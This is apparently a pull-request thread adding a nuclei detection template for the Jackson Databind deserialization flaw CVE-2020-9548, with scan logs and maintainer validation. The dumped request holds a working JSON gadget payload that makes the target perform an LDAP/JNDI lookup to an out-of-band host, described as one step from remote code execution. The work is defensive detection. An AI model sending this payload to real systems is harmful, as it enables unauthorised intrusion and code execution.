Added CVE-2020-9548

[tomaquet18]

Template / PR Information

• Added CVE-2020-9548 detection template
• This template identifies unsafe deserialization in Jackson Databind via the AnterosDBCPConfig class, which can lead to Remote Code Execution (RCE) when enableDefaultTyping is enabled.
• Detection is performed using an Out-of-Band (OOB) DNS-based interaction with Interactsh.

Template Validation

I've validated this template locally?

• YES
• NO

Additional Details

• This template is designed to safely detect potential vulnerability using DNS-based interaction (ldap://{{interactsh-url}}).
• ⚠️ It does not attempt RCE exploitation, because achieving full RCE would require:
  • A rogue JNDI/LDAP server to serve a malicious serialized payload.
• The matcher uses internal: true to avoid duplicate results (e.g., A/AAAA queries).

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

                projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.online
[INF] [CVE-2020-9548] Dumped HTTP request for http://192.168.31.165:8080/vuln

POST /vuln HTTP/1.1
Host: 192.168.31.165:8080
User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Connection: close
Content-Length: 143
Accept: */*
Accept-Language: en
Content-Type: application/json
Accept-Encoding: gzip

[
  "br.com.anteros.dbcp.AnterosDBCPConfig",
  {
    "healthCheckRegistry": "ldap://d1fj2foa7o4eeb02vnt07ujc651p4g1o4.oast.online"
  }
]
[D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4] Received DNS interaction from 149.102.236.197 at 2025-06-28 00:03:13
------------
DNS Request
------------

;; opcode: QUERY, status: NOERROR, id: 48609
;; flags: cd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version 0; flags: do; udp: 1232

;; QUESTION SECTION:
;D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine. IN       AAAA



------------
DNS Response
------------

;; opcode: QUERY, status: NOERROR, id: 48609
;; flags: qr aa cd; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 2

;; QUESTION SECTION:
;D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine. IN       AAAA

;; ANSWER SECTION:
D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine.  3600    IN      A       167.99.69.236

;; AUTHORITY SECTION:
D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine.  3600    IN      NS      ns1.oast.online.
D1fj2fOA7O4eeb02VNT07Ujc651P4g1O4.oast.ONLine.  3600    IN      NS      ns2.oast.online.

;; ADDITIONAL SECTION:
ns1.oast.online.        3600    IN      A       167.99.69.236
ns2.oast.online.        3600    IN      A       167.99.69.236


[CVE-2020-9548:word-1] [http] [critical] http://192.168.31.165:8080/vuln
[WRN] [CVE-2020-9548] Could not execute step on http://192.168.31.165:8080/vuln: [:RUNTIME] got following errors while executing flow <- [:RUNTIME] failed to execute http:1 protocol <- cause="net/http: timeout awaiting response headers" chain="got err while executing http://192.168.31.165:8080/vuln"
[INF] Scan completed in 28.839129915s. 1 matches found.

I'm using a VPN, so that's not my real IP☝️

/claim #12484

References

• NVD Entry
• Original POC
• Sangfor Blog
• ParanoidSoftware: DNS Trigger via Jackson
• Synacktiv Deserialization Tricks

Additional References:

• Nuclei Template Creation Guideline
• Nuclei Template Matcher Guideline
• Nuclei Template Contribution Guideline
• PD-Community Discord server

[princechaddha]

Automated PR Review (Experimental)

---

Thank you for your contribution! You can join our Discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments. Thank you once again.

Required Fixes

• Fix the name field to follow the format: <Vendor> <Product> <Version> - <Vulnerability Class>. It should be formatted as FasterXML Jackson Databind <=2.9.10.4 - Remote Code Execution.
• Add the remediation section to provide guidance on how to mitigate the vulnerability.

Other Suggestions

• Consider verifying that the verified field is set to true once you've confirmed functionality and testing against the vulnerability.
• Ensure that interactsh-url is properly set up in the request to avoid issues in actual exploitation scenarios.
• Review the matchers and consider adding more to minimize false positives if applicable.

Note: I am an AI Template bot, which is still experimental, and the team will review the PR shortly.

[DhiyaneshGeek]

Hi @tomaquet18

Thanks for sharing the template

Is it possible to share the vulnerable set-up details or debug information to [email protected]

[tomaquet18]

Hi @DhiyaneshGeek ,

Thanks for the feedback. I've just sent the vulnerable setup to [email protected] as requested.

Also, regarding the use of {{BaseURL}}: in this case, the vulnerability may reside in a specific endpoint (e.g., /vuln), so replacing it with {{Hostname}} would not preserve the intended request path. Using {{BaseURL}} ensures the request is correctly formed and targets the vulnerable route.

Let me know if you need anything else.

[DhiyaneshGeek]

Hello tomaquet18,

Thank you for sharing the detailed vulnerable setup for the CVE-2020-9548 template. I can confirm that we were able to successfully validate the template using the environment you provided.

We appreciate your thoroughness in including the Docker setup, source code, instructions, and the README.md file. This greatly assisted us in verifying and replicating the issue.

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

		projectdiscovery.io

[INF] Current nuclei version: v3.4.7 (latest)
[INF] Current nuclei-templates version: v10.2.4 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 67
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2020-9548] FasterXML Jackson Databind <=2.9.10.4 - Remote Code Execution (@tomaquet18) [critical]
[INF] Using Interactsh Server: oast.fun
[CVE-2020-9548] [http] [critical] http://0.0.0.0:8082/vuln
[INF] Scan completed in 6.087807042s. 1 matches found.

[tomaquet18]

Hi @DhiyaneshGeek ,

Thank you for the validation and kind feedback!

I'm glad the provided environment was helpful. Let me know if there's anything else I should adjust or improve in the template.